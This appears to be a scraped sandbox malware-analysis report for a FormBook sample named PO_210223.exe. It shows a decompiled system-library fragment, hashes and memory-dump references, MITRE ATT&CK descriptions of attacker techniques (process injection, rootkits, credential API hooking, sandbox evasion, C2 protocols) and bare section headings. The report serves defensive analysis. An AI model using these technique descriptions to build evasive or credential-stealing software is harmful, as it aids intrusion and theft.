				_t7 = E0349CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E034E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E034E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x034efdda
0x034efde2
0x034efde5
0x034efdec
0x034efdfa
0x034efdff
0x034efe0a
0x034efe0f
0x034efe17
0x034efe1e
0x034efe19
0x034efe19
0x034efe19
0x034efe20
0x034efe21
0x034efe22
0x034efe25
0x034efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034EFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034EFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034EFE2B

Memory Dump Source

Source File: 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp, Offset: 03430000, based on PE: true

Associated: 0000000D.00000002.909153575.000000000354B000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.909167522.000000000354F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 8e69737e53f080f18793241e06462af3b34e8713d9a36e414982c9e9989b348d
Instruction ID: 2980cf2feecdf25c18711139685a6e419838dba01f0dc44c3762db6bc429c385
Opcode Fuzzy Hash: 8e69737e53f080f18793241e06462af3b34e8713d9a36e414982c9e9989b348d
Instruction Fuzzy Hash: 12F0FC761002017FEB209A46DC01F23BF5ADB45731F25435AF6245E5D1D962FC3096F8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO_210223.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre